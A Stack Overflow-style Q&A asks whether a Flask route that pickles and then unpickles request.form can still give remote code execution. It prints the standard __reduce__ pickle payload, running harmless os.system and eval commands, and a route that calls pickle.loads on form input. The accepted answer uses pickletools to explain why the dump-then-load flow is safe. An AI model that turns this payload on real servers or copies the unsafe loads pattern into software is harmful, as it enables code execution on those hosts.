# If a server calls pickle.dumps before pickle.loads is there any way for RCE?

Tags: python, security, flask, pickle

Disclaimer: This question is not for malicious purposes!! I am working on my OWN virtual machine!

The article [here](https://davidhamann.de/2020/04/05/exploiting-python-pickle/) demonstrates how loading untrusted pickle data can lead to remote code execution, I am investigating ways of using this workflow without the security issues.

My question is as follows - If I have made it such that the webapp gets a request in Flask, uses `pickle.dumps()` on the `request.form`, then uses `pickle.loads()` on what was previously dumped, is there still a way to execute malicious code?

Example server code:

```
@blueprint.route('/test', methods=['GET', 'POST'])
def test():
    test=pickle.dumps(request.form) 
    test2=pickle.loads(test) # THE CODE SHOULD BE EXECUTED AT THIS POINT
    return ...
```

Is this workflow still vulnerable? From my understanding, the most common type of exploit with pickle comes when b64 string is passed through and interpreted by `pickle.loads()`. However, is it possible to achieve the same results if `pickle.dumps()` is called on the form prior to `pickle.loads()`?

I have tried a couple things, but nothing has panned out. Please let me know if you know the secret code :)

here is an example malicious user code from [the same article](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)

```py
    import pickle
    import base64
    import os
    
    
    class RCE:
        def __reduce__(self):
            cmd = ('echo EXECUTED THIS STATEMENT')
            return os.system, (cmd,)
    
    
    if __name__ == '__main__':
        pickled = pickle.dumps(RCE())
        print(base64.urlsafe_b64encode(pickled))
        # Running pickle.loads(pickle.dumps(RCE())) would execute 'echo EXECUTED THIS STATEMENT'
        # I need to pass through RCE() because pickle.dumps() and pickle.loads() are server-side
```

That would return a base64 string, that when interpreted by `pickle.loads()`, would execute the code in *cmd*.

**But how can you pass the result of `RCE()` in a request, so that it can then be dumped by `pickle.dumps()` on the server-side, before `pickle.loads()` and still execute malicious code?**

Example (This code does not work):

*client code*

```py
class RCE:
    def __reduce__(self):
        cmd = ('echo EXECUTED THIS STATEMENT')
        return os.system, (cmd, )

data = {
    'test': RCE()
}
s = requests.Session()
r = s.post(URL + "/test", data=data)
```

*server-side code*

```
@blueprint.route('/test', methods=['GET', 'POST'])
def test():
    test=pickle.dumps(request.form) 
    test2=pickle.loads(test) # THE CODE SHOULD BE EXECUTED AT THIS POINT
    return ...
```

Example (This code works):

*client code*

```py
class RCE:
    def __reduce__(self):
        cmd = ('echo EXECUTED THIS STATEMENT')
        return os.system, (cmd, )

data = {
    'test': pickle.dumps(RCE())
}
s = requests.Session()
r = s.post(URL + "/test", data=data)
```

*server-side code*

```
@blueprint.route('/test', methods=['GET', 'POST'])
def test():
    test2=pickle.loads(request.form['test']) # THE CODE SHOULD BE EXECUTED AT THIS POINT
    return ...
```

My thinking is the following, is it possible to have a string, that when serialized by `pickle.dumps()` on the server-side, returns the same value as if `pickle.dumps(RCE())` was executed on the client-side. Of course, the result from `pickle.dumps()` on the server side would be a little different because of the `request.form` aspect. From my undestanding, as long as there is executable code in the string, `pickle.loads()` will execute it.

Comment: Maybe you can replace the malicious code by something that works but is obviously harmless.

Comment: Done :) changed to ```ls```

Comment: I don't think I fully understand what you are asking, like `RCE` claims that when pickled it can be reconstructed by calling `os.system` with the given string input, so the pickled data just holds reference to that function and string, I'm not sure what you mean by "_pass the result of RCE() in an object so that it can be dumpled by pickle.dumps()_" isn't this what you already have?

Comment: Here is an example: If I take the result from the print statement, which is the result of ```RCE()``` being dumped by pickle, and run ```pickle.loads()``` on that, the code will be executed. But I CAN NOT do that if it is being dumped first before it is loaded on the server side. It would be the dump, of a dump, being loaded. So how can I pass through the result ```RCE()``` so that it is dumped on server side, before being loaded.

Comment: so using reduce in this way executes malicious code but then loads into the return of `os.system` which is usually an int, are you asking how it could both execute harmful code and give back something that when pickled again would be harmful? Off the top of my head it would probably only be doable with `marshal` which can pickle functions and python code but it explicitly says not to use it unless you are writting a debugger or similar application.

Comment: I have added comments to the code to try and make it clearer. I just need to figure out how to send the result of ```RCE()``` in a request to a server. The server would dump RCE(), then load the result of dumps(RCE()) (which is when the code is executed).

Comment: wait, why is the server dumping `RCE()`? the example in the article you have linked to talks about a **server that loads** arbitrary pickle data and how a **client could dump** malicious pickle data. In your case you should be able to run the flask app on the VM and generate and send the malicious data from your host machine and it will still execute on the VM. I think either we are totally not understanding each other or you are potentially getting confused who is the server and client in the example (I know I get these confused a lot)

Comment: I have made the server **purposely** execute dump before load. I am not confused who is the client and who is server man. Just trying to see if there is a way to do it.

Comment: Can you please clarify what exactly you are asking? ``pickle`` is a security issue for *untrusted third-party input* – it's not clear which parts of your example or application are input.

Comment: The very end of the question is in **bold** which is my question.

Comment: With the way ``RCE`` is defined you can't pickle "the object". But that class definition is not user input, is it? If the user can define arbitrary classes, they can execute arbitrary code anyway – including some that modifies the pickle logic.

Comment: For the record, I don't see what "pickle.dumps() is called on the form prior to pickle.loads()" has to do with anything. It's trivial to define a pickle that runs arbitrary code only during its second (n'th) unpickling, or one that runs arbitrary code and then returns itself again.

Comment: Ok ok, I think I see where you are going, so you are saying that the server instead of just calling `loads` it instead calls `dumps` then `loads` on that and you want a case that could break this? could you put some example server code in your question and phrase it as "is this server flow still vulnerable?" I think that would help us understand what you are trying to ask.

Comment: From my understanding, calling RCE() will execute the __reduce__ functionality, which will then be pickled. Once it is pickled, if you call pickle.loads() on the base64 string returned by pickle.dumps(), the code in ```cmd``` will be executed. I know this will work if, for example, ```pickle.loads(pickle.dumps({'rce':RCE()}))``` is executed. So what I'm trying to figure out is how to pass ```RCE()``` in the request to a server, so that when the server goes ```test = pickle.dumps(request.form) test2=pickle.loads(test)```, the code from ```cmd``` is executed.

Comment: Absolutely, I will add this code to the question :)

Comment: I edited the question so it focuses on "how is this code still vulnerable" without relying too much on refering to the relevant functions and the sequence they get called in.  If it isn't 100% what you are trying to ask then feel free to revert or edit further. That said I think the workflow here is just pickling a b64 string then dumping it back so you get the same string that was input, so there wouldn't be any way of executing remote code but also doesn't reconstruct any data structures that the pickle dump actually contains.

Comment: The problem with this question is that it's too contrived - it'd be very weird for any code to call `pickle.dumps` and `pickle.loads` without some sort of intermediate transmission or storage step, and the intermediate phase is what an attacker would usually target.

Comment: I've deleted my answer because it's just not clear what the scenario actually is. Just pickling and unpickling the ``form`` won't have any effect on the payload. A "base64 string […] when interpreted by pickle.loads" doesn't make much sense, because pickle does not read base64 data. Can you please provide a [mre] of the scenario? It doesn't actually have to send/recv anything, but it should be clear which parts are user input, which parts would be transmission and which parts are the to-be-protected system.

Comment: This is exactly what I meant with this question. Not sure if it is possible, but we'll see. @user2357112supportsMonica, this is a very simplified example so that people can understand what is happening. If we have a bunch of movement, it would be more difficult.

Comment: @TadhgMcDonald-Jensen 's edits. I will add an example.

Comment: Do you actually need to involve requests/flask for the [mre]? Sockets, HTTP and similar are basically a means to move bytes/data from here to there. It shouldn't change the kind if data, nor how it behaves. You can keep in requests/flask if you feel it is relevant, of course, but it makes it much harder to set up for people.

Comment: Well, yes the requests are important because you cannot pass through anything other than strings or integers in a form.

Comment: @user1823456: Then the type constraint is what matters, not the web request.

Comment: Guys, I'm going to the gym. Won't be online for a couple hours. If you can figure this out, god bless. I've been trying this for days. I've provided as much information as possible :)

Comment: Although with a type constraint like that, there's no point bringing in pickle at all. Just use an intrinsically safer format.

Comment: Thats the whole question though ;)

Answer (score 1, accepted):

No there is no way the server can execute remote code by just dumping then loading it, but you can't load pickled data structures either.

I will use `pickletools.dis` to demonstrate what would actually happen:

```py
import pickle
import pickletools
class RCE:
    def __reduce__(self):
        return eval, ("print('MALICIOUS PYTHON CODE HERE')",)

pickled_malicious = pickle.dumps(RCE())
print("what is executed when loading malicious pickle:")
pickletools.dis(pickled_malicious)
print("pickle is type:", type(pickled_malicious))

pickled_string = pickle.dumps(pickled_malicious)
print("what is executed when loading the dump of malicious")
pickletools.dis(pickled_string)
```

when the malicious code is loaded we load the function `eval` or `os.system` as well as the argument then the `REDUCE` op code runs that function:

```sh
what is executed when loading malicious pickle:
    0: \x80 PROTO      3
    2: c    GLOBAL     'builtins eval'
   17: q    BINPUT     0
   19: X    BINUNICODE "print('MALICIOUS PYTHON CODE HERE')"
   59: q    BINPUT     1
   61: \x85 TUPLE1
   62: q    BINPUT     2
   64: R    REDUCE
   65: q    BINPUT     3
   67: .    STOP
```

The pickled malicious code itself though is just a bytes object,

```
pickle is type: <class 'bytes'>
```

so if you dump that the loading would just load a literal bytes object (or maybe string if you are doing base64 encoding but either way it is just a literal at this point)

```sh
what is executed when loading the dump of malicious
    0: \x80 PROTO      3
    2: C    SHORT_BINBYTES b"\x80\x03cbuiltins\neval\nq\x00X#\x00\x00\x00print('MALICIOUS PYTHON CODE HERE')q\x01\x85q\x02Rq\x03."
   72: q    BINPUT     0
   74: .    STOP
highest protocol among opcodes = 3
```

This means that if the server is just calling `pickle.dumps` in the input (which is a string of base64 data or bytes data containing pickle data, either way it is just a literal value when it is dumped) then when it calls `pickle.loads` on that result **it will just get back the original input.**

Any scenario that interprets user input as pickle data is vulnerable - but you aren't doing that here - you are creating pickle data from known safe input (the input string) and then loading that.

Comment: Interesting... Thank you for taking the time to disprove my idea (I am not being sarcastic). I would have pondered over this for a couple of days longer at least :)

Comment: no worries, it was an interesting idea, sorry it took so long for us to understand what you were asking! It might help your understanding to try making an application that the client sends a sequence of numbers (encoded how ever you like), the server squares each and sends the sequence of squares back.  If you want to support complex numbers (which JSON doesn't like) and infinity and `NaN` (which `ast.literal_eval` doesn't like) you will probably have to write your own parser or use `pickle`, and writing a parser for more realistic data structures gets annoying fast.